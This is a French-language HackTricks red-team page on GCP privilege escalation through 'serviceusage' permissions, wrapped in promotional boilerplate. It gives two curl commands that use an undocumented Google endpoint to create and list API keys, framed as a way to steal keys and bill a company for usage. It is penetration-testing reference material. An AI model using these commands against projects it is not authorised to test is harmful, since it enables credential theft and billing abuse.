GCP - Serviceusage Privesc

Apprenez le hacking AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres moyens de soutenir HackTricks :

Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT!
Obtenez le merchandising officiel PEASS & HackTricks
Découvrez La Famille PEASS, notre collection d'NFTs exclusifs
Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez moi sur Twitter 🐦 @carlospolopm.
Partagez vos astuces de hacking en soumettant des PR aux dépôts github HackTricks et HackTricks Cloud.

serviceusage

Les permissions suivantes sont utiles pour créer et voler des clés API, notez ceci des docs : Une clé API est une chaîne cryptée simple qui identifie une application sans aucun principal. Elles sont utiles pour accéder à des données publiques de manière anonyme, et sont utilisées pour associer les requêtes API à votre projet pour le quota et la facturation.

Par conséquent, avec une clé API, vous pouvez faire en sorte que l'entreprise paie pour votre utilisation de l'API, mais vous ne pourrez pas escalader les privilèges.

Pour apprendre d'autres permissions et moyens de générer des clés API, consultez :

pageGCP - Apikeys Privesc

`serviceusage.apiKeys.create`

Une API non documentée a été trouvée qui peut être utilisée pour créer des clés API :

curl -XPOST "https://apikeys.clients6.google.com/v1/projects/<project-uniq-name>/apiKeys?access_token=$(gcloud auth print-access-token)"

`serviceusage.apiKeys.list`

Une autre API non documentée a été trouvée pour lister les clés d'API qui ont déjà été créées (les clés d'API apparaissent dans la réponse) :

curl "https://apikeys.clients6.google.com/v1/projects/<project-uniq-name>/apiKeys?access_token=$(gcloud auth print-access-token)"

PrécédentGCP - Secretmanager Privesc SuivantGCP - Sourcerepos Privesc

Dernière mise à jour il y a 3 mois